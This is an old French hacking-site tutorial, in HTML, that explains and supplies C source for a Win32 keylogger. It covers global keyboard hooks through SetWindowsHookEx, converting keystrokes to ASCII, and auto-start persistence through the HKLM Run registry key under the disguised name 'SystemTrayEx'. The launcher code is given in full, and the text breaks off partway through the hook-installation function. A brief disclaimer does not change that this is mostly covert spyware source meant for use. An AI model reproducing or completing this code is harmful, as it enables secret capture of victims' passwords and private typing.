 
<html>
<head>
<title>HackinG</title>
<meta http-equiv="Content-Type" content="text/html; charset=">
</head>
<body bgcolor="#FFFFF8" text="#000000" link="#339966" vlink="#339966" alink="#339966">
<table width="283" border="0" cellspacing="0" cellpadding="0" background="images/fnd_stitre.jpg" height="40">
  <tr> 
    <td width="23">&nbsp;</td>
    <td width="294"><font face="Verdana, Arial, Helvetica, sans-serif" color="#FFCC00"><font face="Verdana, Arial, Helvetica, sans-serif" color="#FFCC00"><font color="#CCCCCC" size="2">Keylogger 
      Win32 </font></font></font></td>
  </tr>
</table>
<p> 
  <center>
    <p><br>
    <u><font size=+1><a href="#1"><font face="Verdana, Arial, Helvetica, sans-serif" size="2">I) 
    Introduction</font></a></font></u> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
    <u><a href="#2">II) Th&eacute;orie relative au keylogger</a></u> <br>
    <u><a href="#3">III) La pratique</a></u> <br>
    <u><a href="#4">IV) Conclusion</a></u> </font><br>
    </p>
    <p>&nbsp; </p>
  </center>
  <a name="1"></a><u><font color="#990000"><font size="3" face="Verdana, Arial, Helvetica, sans-serif"><b><font size="2">I) 
  Introduction</font></b></font></font></u> 
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Salut tout le 
    monde, voici un nouvel article dans la collection "Je programme des tas de 
    trucs supers avec obscurer", au menu aujourd'hui c'est un keylogger (sous 
    Win 9x car je suis en vancances et donc pas chez moi&nbsp; = pas de NT today). 
    Et oui, dans un premier temps je vais expliquer la th&eacute;orie g&eacute;n&eacute;rale 
    d'un Keylogger, et dans un deuxi&egrave;me temps la pratique. Je n'ai pas 
    eu trop le temps de r&eacute;fl&eacute;chir &agrave; des sujets d'articles 
    pendant les vancances donc vous aurez que 2 articles de moi et c'est tout 
    (en fait Medgi m'a dit : "Comment &ccedil;a marche un keylogger ?" et je me 
    suis dit que &ccedil;a ferait un bon article, donc merci Medgi). Pour nos 
    amis d&eacute;butants : a quoi sert un keylogger : et bien, c'est un programme 
    discret qui passe le plus clair de son temps &agrave; enregistrer dans un 
    fichier toutes les touches que vous tappez (viscieux hein !) Bref, c'est un 
    moyen comme un autre de r&eacute;cup&eacute;rer des informations interressantes 
    sur les utilisateurs d'une machine. Voila. Ha oui j'oubliais, surtout ne lancez 
    pas un keylogger sur une autre machine que la votre, ce n'est pas tr&egrave;s 
    correct. <br>
    Maintenant, fini le blabla, venons-en au fait ! </font>
  <p> 
  <br>
  <a name="2"></a><u><font color="#990000"><font size=+2><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2">II) 
  Th&eacute;orie relative au keylogger</font></b></font></font></u> 
  <p>&nbsp;&nbsp;&nbsp;<font face="Verdana, Arial, Helvetica, sans-serif" size="2"> 
    <i><u>Les Hooks windows</u></i> </font>
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Windows contient 
    un m&eacute;canisme qu'on appelle les 'Hooks'. Les hooks sont dispos&eacute;s 
    en chaines et on appelle &ccedil;a des "hook chains" h&eacute; h&eacute;... 
    heu.... oui donc, un hook c'est une proc&eacute;dure qui est sp&eacute;cifique 
    &agrave; un type d'&eacute;venement, et qui est appell&eacute;e &agrave; chaque 
    fois que l'&eacute;venement se produit. Les hooks peuvent &ecirc;tre sp&eacute;cifiques 
    &agrave; 12 &eacute;venements diff&eacute;rents. <br>
    Exemple : la souris, le clavier, des messages post&eacute;s aux thread., etc... 
    Si je place un hook pour la souris, windows va appeller une fonction que j'aurais 
    fait &agrave; chaque fois que je toucherai &agrave; la souris par exemple. 
    </font>
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Les hooks sont 
    appell&eacute;s en l'ordre inverse de leur cr&eacute;ation, le dernier cr&eacute;&eacute; 
    est le premier appell&eacute;, il d&eacute;cide ensuite si le message doit 
    &ecirc;tre pass&eacute; ou non aux autres hooks (d'ou la notion de chaine 
    : on se passe le message &agrave; la passe passe le oinj :). <br>
    Lorqu'on installe un Hook &agrave; l'aide de l'API "SetWindowsHookEx", il 
    peut &ecirc;tre local au processus ou global (tout le syst&egrave;me) <br>
    Tout le syst&egrave;me ?? Oui...tout... </font>
  <blockquote><tt><font color="#000099">HHOOK SetWindowsHookEx(</font></tt> 
    <p><tt><font color="#000099">&nbsp;&nbsp;&nbsp; int idHook,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font><font color="#006600"> 
      // type of hook to install</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; HOOKPROC lpfn,&nbsp;&nbsp;&nbsp;&nbsp;</font><font color="#006600"> 
      // address of hook procedure</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; HINSTANCE hMod, </font><font color="#006600">// 
      handle of application instance</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; DWORD dwThreadId </font><font color="#006600">// 
      identity of thread to install hook for</font></tt> <br>
      <tt><font color="#006600">&nbsp;&nbsp; );</font></tt>
  </blockquote>
  <p><br>
    <tt><font color="#000099">idHook</font></tt> <font face="Verdana, Arial, Helvetica, sans-serif" size="2">doit 
    contenir : WH_KEYBOARD </font><br>
    <tt><font color="#000099">lpfn</font></tt> <font face="Verdana, Arial, Helvetica, sans-serif" size="2">va 
    contenir l'adresse d'une fonction "KeyboardProc" </font><br>
    <tt><font color="#000099">hMod</font></tt> <font face="Verdana, Arial, Helvetica, sans-serif" size="2">va 
    contenir un handle vers le module contenant la fonction "KeyboardProc" (c'est 
    une DLL voir plus loin) </font><br>
    <tt><font color="#000099">dwThreadId</font></tt> <font face="Verdana, Arial, Helvetica, sans-serif" size="2">doit 
    &ecirc;tre &agrave; NULL pour que le Hook soit lanc&eacute; sur tout le syst&egrave;me 
    (Tout ??? Oui ! tout !) </font>
  <blockquote><tt><font color="#000099">LRESULT CALLBACK KeyboardProc(</font></tt> 
    <p><tt><font color="#000099">&nbsp;&nbsp;&nbsp; int code,&nbsp;&nbsp; </font><font color="#006600">// 
      hook code</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; WPARAM wParam,&nbsp; </font><font color="#006600">// 
      virtual-key code</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; LPARAM lParam&nbsp; </font><font color="#006600">// 
      keystroke-message information</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp; );</font></tt>
  </blockquote>
  <font face="Verdana, Arial, Helvetica, sans-serif" size="2">L'interet ici pour 
  notre programme est de placer un hook de type clavier sur tout le syst&egrave;me, 
  qui permettra &agrave; notre fonction KeyboardProc d'&ecirc;tre appell&eacute;e 
  &agrave; chaque fois que le clavier change de status, de plus notre fonction 
  sera appell&eacute;e avant que le mesage ne parvienne &agrave; l'application 
  destin&eacute;e, on pourra donc modifier le message, bloquer des touches par 
  exemple ce qui n'est pas le but de cet article mais &ccedil;a peut vous interresser, 
  amis lecteurs. </font> 
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Donc, lorqu'on 
    a plac&eacute; le hook de type WH_KEYBOARD qui pemet &agrave; "KeyboardProc" 
    d'&ecirc;tre lanc&eacute;e &agrave; chaque &eacute;venement de type clavier, 
    notre fonction KeyboardProc pourra donc placer la touche frapp&eacute;e dans 
    un fichier. Elle recoit comme param&egrave;tres toutes les informations n&eacute;cessaires 
    &agrave; cela (virtual-key code et lParam contient des info sur la touche 
    frapp&eacute;e et sur l'&eacute;tat du clavier) </font>
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Pour passer le 
    message aux autres hooks su syst&egrave;mes (les autres de la cha&icirc;ne) 
    on fait CallNextHookEx : </font>
  <blockquote><tt><font color="#000099">LRESULT CallNextHookEx(</font></tt> 
    <p><tt><font color="#000099">&nbsp;&nbsp;&nbsp; HHOOK hhk,</font><font color="#006600"> 
      // handle to current hook</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; int nCode,</font><font color="#006600"> 
      // hook code passed to hook procedure</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; WPARAM wParam, </font><font color="#006600">// 
      value passed to hook procedure</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; LPARAM lParam&nbsp; </font><font color="#006600">// 
      value passed to hook procedure</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp; );</font></tt>
  </blockquote>
  <font face="Verdana, Arial, Helvetica, sans-serif" size="2">On a juste &agrave; 
  lui envoyer les param&egrave;tres qu'on a re&ccedil;u (Cette fonction est facultative 
  donc on l'utilise pas) <br>
  De plus, si KeyboardProc retourne FALSE, alors le message arrivera jusqu'&agrave; 
  l'application &agrave; qui il est r&eacute;ellement destin&eacute; (Word, par 
  exemple, enfin, le programme sur lequel on tappe notre texte ultra-secret ;). 
  Si KeyboardProc retourne une valeur non nulle, alors le message n'arrivera pas 
  &agrave; destination (merde... mon clavier marche plus !!!) </font> 
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Un hook se retire 
    avec "UnhookWindowsHookEx" </font>
  <p><tt><font color="#000099">BOOL UnhookWindowsHookEx(</font></tt> 
  <p><tt><font color="#000099">&nbsp;&nbsp;&nbsp; HHOOK hhk&nbsp; </font><font color="#006600">// 
    handle of hook procedure to remove</font></tt> <br>
    <tt><font color="#000099">&nbsp;&nbsp; );</font></tt> 
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Un hook qui se 
    place sur tout le syst&egrave;me, signifie que la fonction appell&eacute;e 
    &agrave; chaque fois que l'on touche au clavier doit se trouver dans une .DLL, 
    ce qui induit un.... </font>
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">&nbsp;&nbsp;<i>&nbsp; 
    <u>Petit rappel sur les DLL (mais alors tout petit)</u></i> </font>
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Une DLL ou Dynamic 
    Load Library, est un module qui peut &ecirc;tre charg&eacute; par un executable. 
    Elle exporte des fonctions. <br>
    Par exemple, quand vous utilisez la fonction "CreateFile", vous loadez la 
    library Kernel32.dll puis vous executez la fonction CreateFile export&eacute;e 
    par kernel32.dll.(d&eacute;sol&eacute; pour ceux qui savent d&eacute;j&agrave; 
    tout &ccedil;a)&nbsp; Pour faire notre keylogger, on va devoir cr&eacute;er 
    un programme qui va loader une DLL. On va cr&eacute;er aussi une DLL qui va 
    exporter les fonctions : InstallHook, UninstallHook et KeyboardProc. <br>
    Une DLL doit contenir une fonction principale, qui sera appell&eacute;e lorsque 
    la DLL sera Load&eacute;e/Unload&eacute;e qui sert pour les initialisations 
    entre autre... </font>
  <p><tt><font color="#000099">BOOL WINAPI DllEntryPoint(</font></tt> 
  <p><tt><font color="#000099">&nbsp;&nbsp;&nbsp; HINSTANCE hinstDLL, </font><font color="#006600">// 
    handle to DLL module</font></tt> <br>
    <tt><font color="#000099">&nbsp;&nbsp;&nbsp; DWORD fdwReason, </font><font color="#006600">// 
    reason for calling function</font></tt> <br>
    <tt><font color="#000099">&nbsp;&nbsp;&nbsp; LPVOID lpvReserved </font><font color="#006600">// 
    reserved</font></tt> <br>
    <tt><font color="#000099">&nbsp;&nbsp; );</font></tt> 
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Si la DLL est 
    attach&eacute;e &agrave; un process, &agrave; un thread, si elle est d&eacute;tach&eacute;e 
    d'un process, d'un thread, cette fonction est appell&eacute;e, <br>
    Elle est appell&eacute;e lorsque LoadModule ou LoadLibrary, ou FreeLibrary 
    etc... est appell&eacute;e. </font><br>
    <tt><font color="#000099">fdwReason</font></tt> <font face="Verdana, Arial, Helvetica, sans-serif" size="2">contient 
    l'une des 4 valeurs possibles, &agrave; savoir : </font><br>
    <tt>DLL_PROCESS_ATTACH</tt> <br>
    <tt>DLL_PROCESS_DETACH</tt> <br>
    <tt>DLL_THREAD_ATTACH</tt> <br>
    <tt>DLL_THREAD_DETACH</tt> <br>
    <font face="Verdana, Arial, Helvetica, sans-serif" size="2">Je dis &ccedil;a 
    comme &ccedil;a, en fait on s'en fout dans notre prog :) </font>
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Quand on code 
    une DLL (Visual C++ pour moi), les fonctions qui s'exportent doivent &ecirc;tre 
    d&eacute;clar&eacute;es ainsi : </font><br>
    <tt><font color="#000099">__declspec(dllexport)int Fuck();</font></tt> <br>
    <font color="#000000" face="Verdana, Arial, Helvetica, sans-serif" size="2">Signifie 
    que Fuck() est export&eacute;e par le module.</font> 
  <p><i>&nbsp;&nbsp;&nbsp;<font face="Verdana, Arial, Helvetica, sans-serif" size="2"> 
    <u>Petit rappel sur le clavier</u></font></i> 
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Comment passe-t-on 
    d'un virtuel key code &agrave; un Ascii key code ? (On s'en fout ? Bein cliquez 
    <a href="#5">ici</a> alors pfff) <br>
    Et bien voila le principe : </font>
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">le fonction KeyboardProc 
    recoit wParam (virtual-key code), et lParam, qui contient entre autre le scan 
    code <br>
    La fonction ToAscii &agrave; besoin du scan code, du virtual key code, et 
    de l'&eacute;tat g&eacute;n&eacute;ral du clavier. </font>
  <blockquote><tt><font color="#000099">int ToAscii(</font></tt> <br>
    <tt><font color="#000099">&nbsp;&nbsp;&nbsp; UINT uVirtKey,&nbsp; </font><font color="#006600">// 
    virtual-key code</font></tt> <br>
    <tt><font color="#000099">&nbsp;&nbsp;&nbsp; UINT uScanCode, </font><font color="#006600">// 
    scan code</font></tt> <br>
    <tt><font color="#000099">&nbsp;&nbsp;&nbsp; PBYTE lpKeyState, </font><font color="#006600">// 
    address of key-state array</font></tt> <br>
    <tt><font color="#000099">&nbsp;&nbsp;&nbsp; LPWORD lpChar,&nbsp; </font><font color="#006600">// 
    buffer for translated key</font></tt> <br>
    <tt><font color="#000099">&nbsp;&nbsp;&nbsp; UINT uFlags&nbsp; </font><font color="#006600">// 
    active-menu flag</font></tt> <br>
    <tt><font color="#000099">&nbsp;&nbsp; );</font></tt></blockquote>
  <tt><font color="#000099">unsigned char *KeyState;</font></tt> <br>
  <tt><font color="#000099">GetKeyboardState(KeyState);</font></tt> 
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Place dans KeyState 
    l'&eacute;tat du clavier en g&eacute;n&eacute;ral <br>
    Pour l'avoir en ASCII on fait : </font>
  <p><tt><font color="#000099">ToAscii(wParam,lParam,KeyState,buffer,0);</font></tt> 
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">buffer contient 
    le caract&egrave;re comme nous le voulons : en ASCII :) </font>
  <p><a name="5"></a><i><u><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Petit 
    rappel sur la base de registre</font></u></i> 
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Nous voulons 
    que notre Keylogger s'execute &agrave; chaque d&eacute;marrage, pour cela 
    il faut rajouter une clef dans la base de registre &agrave; </font>
  <p><tt><font color="#FF6600">HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\</font>&nbsp;&nbsp;</tt> 
    <font face="Verdana, Arial, Helvetica, sans-serif" size="2">pour windows 9x 
    </font>
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">On va appeller 
    cette clef&nbsp; <tt>"SystemTrayEx"</tt>&nbsp; afin de ne pas paraitre 'louche' 
    ;) <br>
    Sa valeur sera le Path vers notre prog, il sera donc ex&eacute;cut&eacute; 
    &agrave; chaque d&eacute;marrage. </font>
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">On va utiliser 
    : RegCreateKeyEx puis RegSetValueEx, puis RegCloseKey. </font>
  <blockquote><tt><font color="#000099">LONG RegCreateKeyEx(</font></tt> 
    <p><tt><font color="#000099">&nbsp;&nbsp;&nbsp; HKEY hKey,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
      </font><font color="#006600">// handle of an open key</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; LPCTSTR lpSubKey,&nbsp;&nbsp; 
      </font><font color="#006600">// address of subkey name</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; DWORD Reserved,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font><font color="#006600"> 
      // reserved</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; LPTSTR lpClass,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font><font color="#006600"> 
      // address of class string</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; DWORD dwOptions,&nbsp;&nbsp;&nbsp; 
      </font><font color="#006600">// special options flag</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; REGSAM samDesired,&nbsp; </font><font color="#006600">// 
      desired security access</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; LPSECURITY_ATTRIBUTES lpSecurityAttributes, 
      </font><font color="#006600">// address of key security structure</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; PHKEY phkResult,&nbsp;&nbsp;&nbsp; 
      </font><font color="#006600">// address of buffer for opened handle</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp; LPDWORD lpdwDisposition </font><font color="#006600">// 
      address of disposition value buffer</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp; );</font></tt>
  </blockquote>
  <font face="Verdana, Arial, Helvetica, sans-serif" size="2">On l'invoque de 
  cette mani&egrave;re : </font> 
  <blockquote>&nbsp; <br>
    <tt><font color="#000099">char *KeyPath = "software\\microsoft\\windows\\currentversion\\run\\";</font></tt> 
    <br>
    <tt><font color="#000099">struct HKEY__ *hKey;</font></tt> <br>
    <tt><font color="#000099">DWORD hKeyResult;</font></tt> 
    <p><tt><font color="#000099">RegCreateKeyEx(HKEY_LOCAL_MACHINE,</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
      KeyPath,</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
      0,</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
      0,</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
      REG_OPTION_NON_VOLATILE,</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
      KEY_ALL_ACCESS,</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
      0,</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
      &amp;hKey,</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
      &amp;hKeyResult);</font></tt> <br>
      &nbsp;
  </blockquote>
  <font face="Verdana, Arial, Helvetica, sans-serif" size="2">La clef est ouverte, 
  maintenant, on la rempli : </font> 
  <blockquote>&nbsp; <br>
    <tt><font color="#000099">char *KeyName="SystemTrayEx";</font></tt> <br>
    <tt><font color="#000099">char *KeyValue=GetCommandLine(); </font><font color="#006600">// 
    Pour r&eacute;cup&eacute;rer le Path de notre file</font></tt> 
    <p><tt><font color="#000099">RegSetValueEx(hKey,KeyName,0,REG_SZ,KeyValue,sizeof(KeyValue)+1);</font></tt> 
      <br>
      &nbsp;
  </blockquote>
  <font face="Verdana, Arial, Helvetica, sans-serif" size="2">On ferme la clef 
  : </font> 
  <blockquote>&nbsp; <br>
    <tt><font color="#000099">RegCloseKey(hKey);</font></tt></blockquote>
  <p><br>
    <font face="Verdana, Arial, Helvetica, sans-serif" size="2">Et voila, le file 
    est execut&eacute; &agrave; chaque d&eacute;marrage ! Nous avons tout les 
    outils pour construire notre Keylogger, c'est parti ! <br>
    D&eacute;sol&eacute; pour ceux qui savaient parfaitement tout ce qui &eacute;tait 
    dis dans les rappels mais tout le monde ne sais pas tout &ccedil;a (si ? oups, 
    sorry) Cependant, si vous n'avez pas tout compris, cliquez <a href="#2">ici</a> 
    :) </font>
  <p> 
  <hr width="100%">
  <br>
  <a name="3"></a><u><font color="#990000"><font size=+2><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2">III) 
  La pratique</font></b></font></font></u> 
  <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">Maintenant, on 
    ne rie plus :|| <br>
    Je vous balance le code et je commente, comme d'habitude ;) </font>
  <p> 
    <center>
      <font color="#990000" face="Verdana, Arial, Helvetica, sans-serif" size="2">*PROGRAMME 
      PRINCIPAL, LANCEUR DU KEYLOGGER*</font> 
    </center>
    <font face="Verdana, Arial, Helvetica, sans-serif" size="2"><tt>-----CUT HERE----------CUT 
    HERE----------CUT HERE----------CUT HERE----------CUT HERE-----</tt> </font>
  <blockquote><tt><font color="#006600">/*</font></tt> <br>
    <tt><font color="#006600">Programme executable du keylogger</font></tt> <br>
    <tt><font color="#006600">by obscurer</font></tt><tt><font color="#006600"></font></tt> 
    <p><tt><font color="#006600">21/08/2k</font></tt> <br>
      <tt><font color="#006600">Copyright Tipiak - www.tipiak.net -</font></tt> 
      <br>
      <tt><font color="#006600">*/</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">#include &lt;windows.h></font></tt> <br>
      <tt><font color="#000099">#define NULL 0</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">HHOOK hHook;</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">int InstallHook (HMODULE hModDLL, HOOKPROC addr);</font></tt> 
      <br>
      <tt><font color="#000099">int UninstallHook();</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">int PASCAL WinMain(HINSTANCE hInstance,HINSTANCE 
      hPrevInstance,</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LPSTR lpCmdLine, 
      int nShowCmd)</font></tt> <br>
      <tt><font color="#000099">{</font></tt> <br>
      <tt><font color="#000099">&nbsp; HOOKPROC addr;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
      </font><font color="#006600">// Utilis&eacute; pour chopper l'adresse de 
      KeyboardProc dans la DLL</font></tt> <br>
      <tt><font color="#000099">&nbsp;</font></tt> <br>
      <tt><font color="#000099">&nbsp; HINSTANCE LibHandle;&nbsp;&nbsp;&nbsp; 
      </font><font color="#006600">// Handle de la DLL</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">&nbsp; char *KeyValue;</font></tt> <br>
      <tt><font color="#000099">&nbsp;</font></tt> <br>
      <tt><font color="#000099">&nbsp; int ret;</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">&nbsp; struct HKEY__ *hKey;&nbsp;&nbsp;</font><font color="#006600">&nbsp; 
      // La clef</font></tt> <br>
      <tt><font color="#000099">&nbsp;</font></tt> <br>
      <tt><font color="#000099">&nbsp; DWORD hKeyResult;</font></tt> <br>
      <tt><font color="#000099"></font></tt>&nbsp;<tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">&nbsp; KeyValue=GetCommandLine();&nbsp;&nbsp; 
      </font><font color="#006600">// On choppe le Path vers le fichier pour mettre</font></tt> 
      <br>
      <tt><font color="#006600">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
      //dans le base de registre</font></tt> <br>
      <tt><font color="#000099">&nbsp;</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">&nbsp; RegCreateKeyEx(HKEY_LOCAL_MACHINE,&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
      </font><font color="#006600">// Cr&eacute;&eacute; la clef</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "software\\microsoft\\windows\\currentversion\\run\\",</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0,</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0,</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; REG_OPTION_NON_VOLATILE,</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; KEY_ALL_ACCESS,</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0,</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &amp;hKey,</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &amp;hKeyResult);</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">&nbsp; RegSetValueEx(hKey,"SystemTrayEx",0,REG_SZ,KeyValue,sizeof(KeyValue)+1);</font><font color="#006600">//on 
      rempli</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">&nbsp; RegCloseKey(hKey);&nbsp;</font><font color="#006600">&nbsp; 
      // On ferme</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">&nbsp;</font></tt> <br>
      <tt><font color="#000099">&nbsp; LibHandle = LoadLibrary("hook.dll");&nbsp;&nbsp;&nbsp; 
      </font><font color="#006600">// On charge la DLL</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(LibHandle==NULL) 
      {goto hell;}</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">&nbsp; addr = (HOOKPROC) GetProcAddress(LibHandle, 
      "?KeyboardProc@@YGJHIJ@Z");</font></tt> <br>
      <tt><font color="#006600">// On choppe l'adresse de KeyboardProc (oui je 
      sais, le nom est bizarre</font></tt> <br>
      <tt><font color="#006600">// mais le DLL exporte ce nom l&agrave;, je ne 
      sais pas pourquoi :/</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(addr==0) { goto 
      hell; }</font></tt> <br>
      <tt><font color="#000099">&nbsp;</font></tt> <br>
      <tt><font color="#000099">&nbsp; ret=InstallHook(LibHandle,addr);&nbsp;&nbsp;&nbsp;</font><font color="#006600"> 
      // Hook install&eacute;</font></tt> <br>
      <tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(ret==FALSE) 
      { goto hell; }</font></tt> <br>
      <tt><font color="#000099">&nbsp;</font></tt> <br>
      <tt><font color="#000099">&nbsp; Sleep(INFINITE);&nbsp;&nbsp;</font><font color="#006600">&nbsp; 
      // J'ai trouv&eacute; que &ccedil;a pour faire attendre le Programme</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp;</font></tt> <br>
      <tt><font color="#000099">&nbsp; UninstallHook();&nbsp;&nbsp;&nbsp;</font><font color="#006600"> 
      // Hook d&eacute;sinstall&eacute;</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">hell:</font></tt> <br>
      <tt><font color="#000099">&nbsp; ExitProcess(NULL);</font></tt><tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return 
      TRUE;</font></tt> <br>
      <tt><font color="#000099">}</font></tt> <br>
      <tt><font color="#000099"></font></tt>&nbsp;<tt><font color="#000099"></font></tt> 
    <p><tt><font color="#000099">int InstallHook (HMODULE hModDLL, HOOKPROC addr)</font></tt> 
      <br>
      <tt><font color="#000099">{&nbsp;&nbsp;&nbsp; </font><font color="#006600">// 
      Cette fonction.... installe le hook (d'ou le nom : installhook)</font></tt> 
      <br>
      <tt><font color="#000099">&nbsp; HANDLE OutFile;</font></tt> <br>
      <tt><font color="#000099">&nbsp; char *buffer;</font></tt> <br>
      <tt><font color="#000099">&nbsp; char *writebuf;</font></tt> <br>
      <tt><font color="#000099">&nbsp; char *time;</font></tt> <br>
      <tt><font color="#000099">&nbsp; char *date;</font></tt> <br>
      <tt><font color="#000099">&nbsp; DWORD temp;</font></tt> <br>
      <tt><font color="#000099">&nbsp; DWORD size;</font></tt> <br>
